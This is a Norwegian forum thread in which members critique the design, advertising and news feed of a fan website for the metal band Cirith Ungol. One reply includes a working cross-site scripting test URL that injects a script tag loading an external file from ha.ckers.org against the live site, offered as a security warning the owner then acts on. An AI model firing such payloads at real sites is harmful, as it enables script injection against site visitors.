Gå til innhold

Kritikk på nettside for et metal-band.


Anbefalte innlegg

Gi meg ris og ros for http://www.truemetal.org/cirithungol/

 

Siden handler btw om et gammelt Heavy Metal band og ikke om Ringenes Herre. Har i grunnen laget alt selv, bortsett fra plogger (fotogalleriet), tinymce og greybox (brukes kun av admin). Banneren er bandlogoen, også utsnitt fra de fire albumene de ga ut med litt endrete fargetoner.

Endret av MikkelRev
Lenke til kommentar
Videoannonse
Annonse

Jeg ville ha lagt til litt padding på menyen, i hvertfall pollen. Ser ikke bra ut når teksten er presset helt inntil kanten. Midtstill reklamen under menyen. Samme med google adsensen som er nederst på siden. Lag gjerne litt padding også mellom den og bunnen. Anbefaler også å sikre litt mot XSS og SQL injection http://www.truemetal.org/cirithungol/page.php?page_id=%27%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E

 

Ellers synes jeg mellomrommet mellom bildene/albummene ofte er unormalt stort, mulig det kan være en ide å minske det litt. Jeg ville ha skjekket ut kommentarfeltet litt nærmere da jeg hverken fikk trykt på B, I, eller U (i firefox). Dette blir bare pirk, men jeg pleier å anbefale å legge en tom index.html fil i mapper slik at folk ikke kan snoke rundt på serveren http://www.truemetal.org/cirithungol/images/ sånn som man kan gjøre her.

 

En del av sidene er ganske kjedelige bygd opp som f.eks denne http://www.truemetal.org/cirithungol/page.php?page_id=164

 

En laaaang artikkel som jeg ville vurdert noen bilder til å piffe opp. Dessutten ser det ikke så veldig bra ut med all den bold teksten (i hvertfall etter min mening), men mulig det er nødvendig.

Lenke til kommentar

Takk for tilbakemelding! :)

 

Venstre-padding i poll og meny er lagt til og google adden under menyen er sentrert.

 

Har oppgradert sikkerheten bittelitt ved hjelp av strip_tags, is_numeric og mysql_real_escape_string, sjekk om den er bra nå.

 

Mellomrommet mellom albumene sliter jeg litt med å få til, siden alle sidene følger samme malen og jeg prøver å unngå å bruke <table>. Har gjort den littegrann mindre nå. Hver menuitem er innlemmet i slike bokser: <div style="margin:30px;height:200px;float:left;width:37%;padding-left:10px">

 

Google adsensen på bunnen klarte jeg ikke å lage vertikal mellomrom mellom. Prøvde å innlemme den i en div og sette både padding og margin bottom til en høy verdi + endre padding og margin top til boksen rett under, men alt stod i ro. Til og med 500px utgjorde null forskjell, så ble lei og flyttet den likegjerne litt opp. Håper ikke den er altfor forstyrrende der den står nå.

 

Hos meg så blir skriften endret umiddelbart i kommentarfeltet med u, i og b. Bruker FF366. Testet det nå ved å lage fire linjer, en som het Vanlig, Bold, Kursiv og Underline, og endret skriften på deretter. Vis kildekode på tekstboksen viste at de hadde fått <u>, <i> og <b>-tagger. Bruker forresten TinyMCE for dette.

 

Index-filer er lagt til.

 

Skal legge til litt bilder på de to biografiene snart.

Lenke til kommentar
  • 4 uker senere...

Bump!

 

Flere kommentarer?

 

En konkret ting jeg holder på med er å oppgradere News Feed'en. Slik er den gamle versjonen:

http://www.truemetal.org/cirithungol/newsfeed.php

Den nye ulanserte jeg holder på med nå:

http://www.truemetal.org/cirithungol/newsfeed1.php

Den nye er bedre og har flere finesser. Feks kan du øverst velge hvilken kilde du skal hente feeds fra, og det er mer info på hver feed. Men denne nye virker mer rotete, og mer uoversiktlig enn den gamle. Noen layout/designtips?

Lenke til kommentar

Nettsiden er oversvømt med reklame. Reklame er ikke noe man forventer når man besøker en band-side.

 

Bakgrunnen er desverre ganske dårlig og repeterer elendig.

 

http://www.truemetal.org/cirithungol/newsfeed.php

Er mye mer ryddig enn det nye systemet du holder på med og er mye enklere å lese.

 

Sources på det nye newsfeed systemet er dårlig gjennomført med logoer i ulik størrelse og det tar samtidig mye plass slik at det som er relevant forsvinner bort fra skjermen.

Lenke til kommentar
Nettsiden er oversvømt med reklame. Reklame er ikke noe man forventer når man besøker en band-side.
Reklame er ganske normalt på fansider. Se feks http://www.ironmaidencommentary.com/ og http://black-sabbath.com/.

Virker det oversvømt av reklame på News Feed'en eller overalt på hele nettsiden?

 

 

Bakgrunnen er desverre ganske dårlig og repeterer elendig.
Forslag til noen bedre? Har prøvd litt forskjellige allerede og synes denne sitter relativt greit iforhold til mange andre.

 

Sources på det nye newsfeed systemet er dårlig gjennomført med logoer i ulik størrelse og det tar samtidig mye plass slik at det som er relevant forsvinner bort fra skjermen.
Ja jeg er ikke fornøyd selv hvordan det ser ut med det nye systemet. Jeg ønsker å ha alle finessene som er lagt til, men dessverre ser det ganske trangt og rotete ut nå. Kan godt fikse logoer i lik størrelse under Sources, men tror ikke det vil løse alt. Hver feed/item føles også mindre oversiktlig enn før.
Lenke til kommentar
Nettsiden er oversvømt med reklame. Reklame er ikke noe man forventer når man besøker en band-side.
Reklame er ganske normalt på fansider. Se feks http://www.ironmaidencommentary.com/ og http://black-sabbath.com/.

Virker det oversvømt av reklame på News Feed'en eller overalt på hele nettsiden?

 

Grunnet min uvitenhet angående Cirith Ungol som band, så trodde jeg dette var en slags "offisiell" side for kjenninger av deg. Det viser seg altså å være helt feil.

 

En fan-side setter ting i andre perspektiv, men ja, det er litt mye reklame på newsfeeden.

Lenke til kommentar

You are trying to access an invalid page, or a page you don't have access to.

ERRORCODE: a01 

 

Siden funker ikke lengre som den skal. Men dette var et morsomt treff så får kommentere allikevel:

 

Dette var dårlig. Og det er spesielt to ting som gjør det slik.

 

1) bakgrunnen din. dette lukter det webutvikling anno 1995 av.

 

2) reklamen du har valgt å legge til på siden.

Du argumenterer med at andre sider som iron maiden's og black sabbath's websider også har annonser... det byr IKKE at det er bra.

Ta turen til iron maidens offesielle hjemmeside du, http://www.ironmaiden.com/index.php, er ikke mye drit på de sidene. Litt "dull" men nice and clean struktur.

Legg merke til at de ikke kjører reklame på annet enn seg selv og sine egne varer.

 

Om jeg skulle ha gitt et tips: redesign og strekk deg etter ironmaiden's design og struktur.

Lenke til kommentar

Takker for alle tilbakemeldinger, keep em coming :thumbup:

 

Cirith Ungol er et gammelt metalband som ikke har vært aktive siden 92. Webmastre for offisielle sider som ironmaiden.com og metallica.com får garantert godt betalt. Forøvrig synes jeg ingen av de to nevnte er spesielt bra sider. Til og med mange offisielle sider (feks deeppurple.com) kjører reklame. Jeg tjener null og nada for alt arbeidet mitt. Har virkelig brukt uttallige timer på den siden, både på kode og innhold. Derfor synes jeg det blir litt urettferdig å sammenligne med en offisiell side som ikke har reklame. Så inntil noen spør om å få være sponsor, er det nok mest aktuelt å fintune reklamen og plassere den på hensiktsmessige og ikke altfor forstyrrende steder.

 

Jeg syntes den gamle bakgrunnen så kurrant ut, synes det ga en litt 3D-effekt på hjørnet til innholdet. Men har skiftet ettersom alle andre synes noe annet. Ser ikke bedre ut i mine øyne. Vad tycks?

 

Har også skiftet comic sans til arial.

 

Har også fikset a01-buggen.

Lenke til kommentar

joda ble bedre, men siden er rotete framdeles, klarer liksom ikke og få oversikt over siden uten å bruke mye tid på å titte liksom

 

Enig.

Bare rot, dårlig oversikt.

 

Først av alt bør du fjerne bakgrunnen. Lag en finere header og lag en "reinere" meny. Og skriften "Arial/Helvetica/sans-serif" hjelper til å lage mer rot.

 

Søkeboks-diven din er også 10px for langt opp (går over headeren/deler av headeren ligger under søkeboksen). Bruker firefox 4.0.3, 1080x1020.

Lenke til kommentar
  • 1 måned senere...

Oj det må jeg si. Jeg skal fortelle deg akkurat hva jeg følte når jeg gikk inn på siden:

 

ROT!

 

 

Og det er mange grunner til det. Typografien finnes ikke, du har valgt en bakgrunn som er meget dominerende, ting er bare plassert tilfeldig rundt om kring osv.

 

Her må du brette opp ermene og lære deg å lage skikkelig nettsider. Det du har laget ser ut til å stamme fra urtiden, og det er ikke slik man lager nettsider lengre..

 

Så, sleng deg innom www.bestwebgallery.com og se hvordan nettsider skal se ut. Det er det MASSE inspirasjon, og legg merke til hvordan de plasserer elementer, tekst, bilder osv rundt på siden. ALT er plassert med pixel for pixel nøyaktighet for å unngå at leserne blir svimle når de går innpå siden! :)

 

Deretter kan du sikkert gå inn på www.htmldog.com for å lære deg å kode basic HTML og CSS.

 

 

Lykke tel viare!

 

 

EDIT: en liten ting til som kanskje får deg til å tenke:

 

Hvorfor har du plassert ting rundt som de er? Er det en hensikt med det? Det skal nemlig være det.

 

Eksempel: Bakgrunnen er ekstremt dominerende og det er noe av det første jeg legger merke til. Skal jeg legge merke til den bakgrunnen? Er det hensiktsmessig at jeg skal gjøre det? Det er vel innholdet du skal legge fokus på, og ikke bakgrunnen, ikkesant?

Endret av AnaXyd
Lenke til kommentar
  • 2 uker senere...

Altså, jeg kan ikke annet enn å være enig med de andre her.

 

Siden ser ut som om det er fra 90-tallet. Selve bakgrunnen på innholdet er helt jevnt lysegrå, mens bakgrunnen på siden er så utrolig dominerende. I tillegg er menyen helt jevnt svart. Alt hva gjelder farger og mønstre på denne siden er totalt feil.

 

I tillegg er innholdet plassert tilfeldig rundt på den store flata. Ikke bare det at dette gir enda mer assosiasjoner til 90-tallet, men det er vanskelig å skaffe seg noen oversikt over siden.

 

Og hvis du først skal ha reklame på siden så kan du ikke plassere den slik at det ser ut som om den er en del av innholdet. Nettsiden virker direkte useriøs, eller i beste fall eldgammel, også på grunn av det.

 

Det er greit nok at du har brukt timesvis på denne nettsiden, men det hjelper ikke når nettsiden faktisk er stygg. Hvorfor skal du tjene penger på nettsiden, når du ikke en gang klarer å legge inn reklame på en brukbar måre?

 

Jeg kunne prøvd meg som trappesnekker, brukt timer hver dag på det, men jeg hadde ikke tjent en jævla krone hvis rekkverket var skakt, to trappetrinn var ødelagt og det var malingssøl på resten.

 

For å si det enklere: Lær deg å lage nettsider før du begynner med det.

 

Dette var sikkert hard kost, men det er sant. Jeg ser ingen vits i å presse det fram i halvslemme innlegg. Nå får du alt på en gang, så har du noe å jobbe med. Og hvis du faktisk lærer deg å lage nettsider før du faktisk prøver deg på det, så ville du også brukt mindre tid på en langt penere side. Følg rådene du får.

Endret av program
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
×
×
  • Opprett ny...